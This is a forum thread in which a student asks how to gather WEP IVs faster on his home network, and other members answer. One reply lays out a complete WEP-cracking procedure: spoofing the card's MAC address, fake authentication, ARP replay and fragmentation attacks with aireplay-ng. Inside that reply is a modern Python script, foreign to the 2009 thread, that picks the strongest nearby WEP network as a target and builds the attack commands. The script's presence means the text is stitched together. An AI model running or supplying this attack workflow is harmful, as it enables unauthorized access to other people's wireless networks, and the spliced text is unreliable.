
Thread: Acquiring ARP and IVs

  1. #1
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    5

    Acquiring ARP and IVs

    Hello All,

    My first post in Remote Exploit Forums, so hopefully I start off on the right foot.

    I have been taking a security class and we used BT4 for the class. All of our work was in a lab environment, so it was meant to be accessed. Now I am testing what I learned on my home network. My first task has been to crack the WEP on my router. I am able to receive packets and collect ARPs and IVs. I have 128-bit encryption and, from my reading, it is suggested to have between 200k and 500k IVs. While I am collecting them, it is slow going. I have tried the command:

    iwconfig eth1 rate auto (I know I say eth1 but this card is the wireless)

    It seems that the amount of activity on the network greatly impacts the rate at which I am able to acquire ARPs and IVs. However, in my lab there was not much activity, and in all the tutorials I watch this number increases rapidly. Is there a way to increase the rate at which I acquire this data?

    The system I am using at home is also different from what I used for class. My BT4 machine is a VM on my Windows box, an XPS Notebook. I am having issues getting my D510 to boot from the BT4 disc (another issue I think I can figure out on my own with the tons of information out there). So I am using the BT3 boot disc which I got in my Hakin9 Mag. Not sure if that makes a difference.

    Thanks in advance.

  2. #2
    Member
    Join Date
    Dec 2007
    Location
    The Netherlands
    Posts
    267


    I assume your lab tutorial used one ARP to inject into the router, making the IVs increase rapidly without being dependent on network activity.

    Look through the forums for some (arp) injection tutorials, it's not too hard once you have an ARP to work with.

  3. #3
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    5


    Thank you for the post. Now that you say that, I think I am missing a step. I am going back through my notes.

  4. #4
    Member
    Join Date
    Dec 2007
    Location
    The Netherlands
    Posts
    267


    You're welcome.

  5. #5
    Just burned his ISO
    Join Date
    Apr 2009
    Posts
    6


    OK, I am new to all of this as well, and I have seen times where the data would go really fast or really slow. After testing in different environments I found that this is due to the type of router firmware, not the distance from the routers.

    As I was running a test in one environment I noticed the data was not going up at all, because the ARP count was not increasing like it was in most videos. I did however manage to get it working; it takes a little longer (still under 10 minutes). Like I said, I am new at this, but after playing around with some settings, here are the exact steps I take to get that ARP count to increase.

    Open console
    Step 1.
    airmon-ng stop wlan0

    Step2.
    ifconfig wlan0 down

    Step 3.
    macchanger --mac 00:11:22:33:44:55 wlan0

    Step4.
    airmon-ng start wlan0

    Step 5.
    Clear screen

    Step 6.
    airodump-ng wlan0

    This will display a list of wireless networks
    Pay attention to the network channel and the PWR values. I like to choose a network with a higher PWR, even if there is only 1 showing under the DATA section. However, I find that if there is a PWR value of 20-30 with nothing in DATA, I take note of the channel number and add that to the next command so my wireless interface is not scanning everything and can put its focus on one channel and one BSSID.

    Step 7.
    Now that you have the BSSID, and Channel number press CTRL + C to cancel the previous airodump-ng command. Type the following new command using the BSSID and Channel number:

    airodump-ng -c 11 -w dlink --bssid 00:13:A5:6D:FF:0B wlan0

    -c = Channel
    -w = the file you create that will be used in the aircrack-ng steps. I usually keep this set to one word such as the ESSID you are attempting to access
    --bssid = Address of WAP (Wireless Access Point)

    Once this step is finished I tend to let it run and I minimize the console and open a new console, NOT A NEW TAB.

    Step 8.
    Minimize console and open a new console

    Step 9.
    The next step was the one of the two things that changed the way my ARP would increase. Type the following command in the new terminal window:

    aireplay-ng -1 1 -a 00:13:A5:6D:FF:0B -h 00:11:22:33:44:55 wlan0

    When you run this command you should get a message saying that the ESSID is an Open network and you should get authentication. To verify this, open the first window that is running Airodump-ng. The AUTH column should display OPEN under it, meaning that it's using OPEN and not SHARED authentication. Since I'm writing about OPEN, that's going to be the value for this post.

    Minimize the Airodump-ng screen and bring back up the aireplay-ng command you just ran. Notice that it keeps going and going. This is because of the "-1 1" value we have entered. I like to keep this going, as it keeps a steady flow of data from my box to the AP. This helps get my ACKs up and get the ARP flowing.

    Step 10.
    Minimize the Aireplay-ng terminal letting it continue to run the command and open a new terminal.

    Step 11.
    Type the following command:

    aireplay-ng -3 -b 00:13:A5:6D:FF:0B -h 00:11:22:33:44:55 wlan0

    After you enter this command you will notice the information that gets displayed across the top. This command will allow your interface to read packets, obtain ARP requests (which will increase your DATA value in Airodump-ng, which you have minimized) and also present the number of ACKs, sent packets and pps.

    I found this is where I was having no luck in getting my DATA to increase in Airodump-ng. I tested on 64- and 128-bit networks and nothing; this would just stay there collecting ACKs and not really doing anything.

    This next step is where I was able to get the ACKs to increase quicker, giving my DATA a short increase in value before everything suddenly kicks in and starts flying.

    Step 12.
    Minimize the currently used Aireplay-ng terminal, letting it continue running, and open a new terminal window.

    Step 13.
    Type the following command
    aireplay-ng -5 -b 00:13:A5:6D:FF:0B -h 00:11:22:33:44:55 wlan0

    Once you enter this command, keep this window open. You will notice it will start reading packets. Once a packet is read it will ask you whether to use that packet. Press the letter "Y" on your keyboard and press enter. It will then send information to the AP. Once that packet is complete, if you look at the Airodump DATA value you will notice it increase slightly. This process will repeat. After it has completed trying the current packet it will ask you again; just keep pressing "Y" every time you are asked. This is why I keep this window on top of all others.

    Once this command has started running, bring back up the following two screens:
    Airodump-ng
    Aireplay-ng -3 (the terminal that displays the Packets, ACKS, ARP Requests)
    Move the windows around so you can see them all at the same time, making sure to keep the window running Aireplay-ng -5 as the window with focus.

    Let this run, and within a few minutes you will notice that the terminal running Aireplay-ng -3 will start flying with ARP Requests and your Airodump-ng window will start adding values to the DATA field really quickly, and before you know it you will have enough DATA to run your Aircrack-ng.

    As I said, this is the ONLY way I can get on specific Access Points. May or may not work for you, but playing with some settings and trial and error, this is what panned out to be the best method for me.

    Also note that when running the command Aireplay-ng -5, when the data packet gets read and you choose to use it, you may sometimes see a message saying that it has gotten a 384-bit keystream, and if you're lucky it will save it as a file for you, which you can also use to increase your DATA values.

    One way to tell when you're about to get a load of ARP Requests is to pay attention to the Aireplay-ng -3 screen. When this command is running, all text is displayed with no spaces or line breaks. As your computer keeps associating with the AP while running this command, it will eventually pause for a moment; this pause-like action will display a blank empty line, so it's not hard to miss. Once you see this empty line, or start seeing more and more of them, it's pretty much a sign you are communicating and you are about to get all the ARP Requests needed to get a good DATA value for Aircrack-ng.
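
    The selection in step 6 (pick the strongest WEP network, note its channel and BSSID), the three aireplay-ng terminals in steps 9, 11 and 13, and the IV target from the first post can be checked from the CSV file that the `-w` prefix in step 7 makes airodump-ng write. The script below is an added example for this thread, not code from any poster or from the aircrack-ng project. It parses a constructed `<prefix>-01.csv` in airodump-ng's layout, picks the target the way post #5 does, reports how far the IV count is from the 200k figure post #1 quotes, and builds the command lines so that the fake-auth MAC (`-h`, the attacker's own card) and the BSSID (`-a`/`-b`) cannot be mixed up. The sample CSV, the MAC addresses and the `-70 dBm` cutoff are assumptions; the SKA check reflects that aireplay-ng's fake authentication against a shared-key AP needs a keystream file, which this script does not produce.

```python
"""Pick a WEP target from an airodump-ng CSV and build the aireplay-ng commands.

Added example for the thread above; not code from the posters or from the
aircrack-ng project.  The CSV layout (header fields, comma separators, a blank
line and then a "Station MAC" section) is the one airodump-ng -w writes.
"""
import re
import shlex

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed sample of an airodump-ng <prefix>-01.csv; not a real capture.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:13:A5:6D:FF:0B, 2009-08-20 21:03:11, 2009-08-20 21:15:42,  11,  54, WEP , WEP, OPN, -41,      812,    41230,   0.  0.  0.  0,   5, dlink,
00:1C:F0:11:22:33, 2009-08-20 21:03:12, 2009-08-20 21:15:40,   6,  54, WPA2, CCMP, PSK, -55,      790,        0,   0.  0.  0.  0,   7, homenet,
00:0F:66:AA:BB:CC, 2009-08-20 21:03:15, 2009-08-20 21:15:41,   1,  11, WEP , WEP, SKA, -78,      301,      120,   0.  0.  0.  0,   6, oldnet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2009-08-20 21:04:00, 2009-08-20 21:15:42, -30,      950, 00:13:A5:6D:FF:0B,
"""


def parse_access_points(csv_text):
    """Return one dict per access-point row; stops at the station section."""
    aps = []
    for line in csv_text.splitlines():
        if line.startswith("Station MAC"):
            break
        parts = [p.strip() for p in line.split(",")]
        if len(parts) < 14 or not MAC_RE.match(parts[0]):
            continue  # header line, blank separator, or junk
        aps.append({
            "bssid": parts[0],
            "channel": int(parts[3]),
            "privacy": parts[5],        # "WEP", "WPA2", "OPN", ...
            "auth": parts[7],           # "OPN" or "SKA" for WEP networks
            "power": int(parts[8]),     # dBm; -41 is stronger than -78
            "ivs": int(parts[10]),      # "# IV" column, what aircrack-ng needs
            "essid": parts[13],
        })
    return aps


def choose_target(aps, min_power=-70):
    """Strongest WEP network, the way post #5 picks by PWR.
    Older drivers report positive PWR values; pass min_power=0 for those."""
    wep = [a for a in aps
           if "WEP" in a["privacy"].upper() and a["power"] >= min_power]
    return max(wep, key=lambda a: a["power"]) if wep else None


def iv_progress(ap, target_ivs=200_000):
    """Fraction of the IV count post #1 quotes as a starting point for 128-bit WEP."""
    return min(ap["ivs"] / target_ivs, 1.0)


def attack_commands(target, smac, iface, prefix):
    """argv lists for the capture and the three aireplay-ng terminals of post #5.
    The same source MAC (-h) is used for -1, -3 and -5: the AP must have accepted
    it in fake auth, or the replayed frames are dropped."""
    for mac in (target["bssid"], smac):
        if not MAC_RE.match(mac):
            raise ValueError(f"bad MAC address: {mac!r}")
    if not 1 <= target["channel"] <= 14:
        raise ValueError(f"bad channel: {target['channel']}")
    if target["auth"] == "SKA":
        raise ValueError("AP uses shared-key auth; plain -1 fake auth will not work")
    b, c, h = target["bssid"], str(target["channel"]), smac
    return {
        "capture":   ["airodump-ng", "-c", c, "-w", prefix, "--bssid", b, iface],
        "fakeauth":  ["aireplay-ng", "-1", "1", "-a", b, "-h", h, iface],
        "arpreplay": ["aireplay-ng", "-3", "-b", b, "-h", h, iface],
        "fragment":  ["aireplay-ng", "-5", "-b", b, "-h", h, iface],
    }


if __name__ == "__main__":
    aps = parse_access_points(SAMPLE_CSV)
    t = choose_target(aps)
    print(f"target {t['essid']} {t['bssid']} ch {t['channel']} pwr {t['power']}")
    print(f"IVs: {t['ivs']} ({iv_progress(t):.0%} of 200k)")
    for name, argv in attack_commands(t, "00:11:22:33:44:55", "wlan0", t["essid"]).items():
        print(f"{name:10s} {shlex.join(argv)}")
```

    Run it against a real `dlink-01.csv` by replacing `SAMPLE_CSV` with the file contents; re-reading the file while the terminals from post #5 run gives a cleaner progress number than watching the DATA column. The 200k figure is only what the first post quotes: the PTW attack in current aircrack-ng usually recovers a 128-bit key from well under 100k IVs, so it is worth trying aircrack-ng on the capture before the count gets that high.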

  6. #6
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    14


    There is a video of these steps (the exact same steps) in the howto section.

    To be honest prosper I really hope you didn't watch the video and type out what he was doing, you could have just pointed him to it instead.

  7. #7
    Member
    Join Date
    Dec 2007
    Location
    The Netherlands
    Posts
    267


    Quote Originally Posted by Sejah:
        There is a video of these steps (the exact same steps) in the howto section.

        To be honest prosper I really hope you didn't watch the video and type out what he was doing, you could have just pointed him to it instead.

    Plaintext is easier to print out than a video though.

  8. #8
    Just burned his ISO
    Join Date
    Apr 2009
    Posts
    6


    Quote Originally Posted by Sejah:
        There is a video of these steps (the exact same steps) in the howto section.

        To be honest prosper I really hope you didn't watch the video and type out what he was doing, you could have just pointed him to it instead.

    Actually no I never watched the video, what I did was all by reading on here, trial and error and playing with some of the attributes.

    I found that by what I was doing I was not getting any ARP Requests.

    Since you mentioned the video: he does what I do in a similar way; however, he does not let the command below keep running. He did it once so it associated. I did it to keep it associated, and it worked.
    Code:
    aireplay-ng -1 1 -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0
    Also, within the video he does not do the command
    Code:
    aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0
    I found that adding these steps increased the speed of the ARP Requests and I was able to get enough IVs to do an aircrack-ng.

    I don't watch and do; how do you learn? You need to make mistakes and learn as you go, and this method does the job for me quite well, and as Citruspers said:
        Plaintext is easier to print out than a video though.
    So I hope my method works for those who have difficulties. I'm new at this and am only trying to learn what I can about network security.
